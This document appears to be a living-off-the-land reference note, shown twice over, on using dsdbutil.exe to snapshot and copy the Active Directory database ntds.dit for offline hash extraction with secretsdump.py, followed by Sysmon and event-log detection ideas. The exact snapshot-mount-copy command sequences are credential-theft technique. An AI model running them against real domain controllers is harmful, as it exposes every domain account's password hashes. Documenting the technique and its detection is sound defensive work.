sasqwatch/dsdbutil.exe

## dsdbutil.exe
DSDButil
========

- dsdbutil (dsdbutil.exe) is utility for performing maintenance on AD/LDS databases [https://docs.microsoft.com/en-us/previous-versions/windows/it-pro/windows-server-2012-r2-and-2012/cc753151(v%3Dws.11)]
- dsdbutil supports VSS snapshot creation
- dsdbutil can be used to extract the AD database (ntds.dit) for offline analysis (with secretsdump.py)

- Example #1: Using Snapshot GUID obtained from cmd output

dsdbutil.exe "activate instance ntds" "snapshot" "create" "quit" "quit"
dsdbutil.exe "activate instance ntds" "snapshot" "mount {GUID}" "quit" "quit"
copy c:\[Snap Volume]\windows\ntds\ntds.dit c:\users\administrator\desktop\ntds.dit.bak
dsdbutil.exe "activate instance ntds" "snapshot" "delete {GUID}" "quit" "quit"

- Example #2: Living dangerously with (assumed) snapshot identifier

dsdbutil.exe "activate instance ntds" "snapshot" "create" "list all" "mount 1" "quit" "quit"
copy c:\[Snap Volume]\windows\ntds\ntds.dit c:\users\administrator\desktop\ntds.dit.bak
dsdbutil.exe "activate instance ntds" "snapshot" "list all" "delete 1" "quit" "quit"

*dsdbutil also supports an interactive mode, which is likely more stable than the examples above.

===========================
*Defensive Considerations

I chatted with @SBousseaden about a few Sysmon detection strategies.  Here are a few ideas:

- CMDline logging is interesting - dsdbutil can run a string of commands (i.e. as demonstrated above)
  or interactively (to hide actual commands)

- Although a bit combersome, "Service Control Manager" source for VSS will be logged as System Event ID 7036 with
  a description of "The Microsoft Software Shadow Copy Provider service entered the running state."

- If a volume is mounted,a "NTFS" source will be logged as System Event ID 98 with a description highlighting
  the Volume Shadow Copy ID such as "Volume ?? (\Device\HarddiskVolumeShadowCopy17) is healthy.  No action is needed."

- With a mount operation, dsdbuil mounts the snapshot at the logical drive root with a prefix
  of "$SNAP_" (e.g. C:\$SNAP_201906250551_VOLUMEC$\).  This has utility for monitoring interesting "Image Names"
  or paths for Sysmont events (e.g. FileCreate, Execute, etc.).

- And of course, Sysmon Events that contain "HarddiskVolumeShadowCopy" within the Image and Cmdline fields are always interesting as well
	DSDButil
	========

	- dsdbutil (dsdbutil.exe) is utility for performing maintenance on AD/LDS databases [https://docs.microsoft.com/en-us/previous-versions/windows/it-pro/windows-server-2012-r2-and-2012/cc753151(v%3Dws.11)]
	- dsdbutil supports VSS snapshot creation
	- dsdbutil can be used to extract the AD database (ntds.dit) for offline analysis (with secretsdump.py)

	- Example #1: Using Snapshot GUID obtained from cmd output

	dsdbutil.exe "activate instance ntds" "snapshot" "create" "quit" "quit"
	dsdbutil.exe "activate instance ntds" "snapshot" "mount {GUID}" "quit" "quit"
	copy c:\[Snap Volume]\windows\ntds\ntds.dit c:\users\administrator\desktop\ntds.dit.bak
	dsdbutil.exe "activate instance ntds" "snapshot" "delete {GUID}" "quit" "quit"

	- Example #2: Living dangerously with (assumed) snapshot identifier

	dsdbutil.exe "activate instance ntds" "snapshot" "create" "list all" "mount 1" "quit" "quit"
	copy c:\[Snap Volume]\windows\ntds\ntds.dit c:\users\administrator\desktop\ntds.dit.bak
	dsdbutil.exe "activate instance ntds" "snapshot" "list all" "delete 1" "quit" "quit"

	*dsdbutil also supports an interactive mode, which is likely more stable than the examples above.

	===========================
	*Defensive Considerations

	I chatted with @SBousseaden about a few Sysmon detection strategies. Here are a few ideas:

	- CMDline logging is interesting - dsdbutil can run a string of commands (i.e. as demonstrated above)
	or interactively (to hide actual commands)

	- Although a bit combersome, "Service Control Manager" source for VSS will be logged as System Event ID 7036 with
	a description of "The Microsoft Software Shadow Copy Provider service entered the running state."

	- If a volume is mounted,a "NTFS" source will be logged as System Event ID 98 with a description highlighting
	the Volume Shadow Copy ID such as "Volume ?? (\Device\HarddiskVolumeShadowCopy17) is healthy. No action is needed."

	- With a mount operation, dsdbuil mounts the snapshot at the logical drive root with a prefix
	of "$SNAP_" (e.g. C:\$SNAP_201906250551_VOLUMEC$\). This has utility for monitoring interesting "Image Names"
	or paths for Sysmont events (e.g. FileCreate, Execute, etc.).

	- And of course, Sysmon Events that contain "HarddiskVolumeShadowCopy" within the Image and Cmdline fields are always interesting as well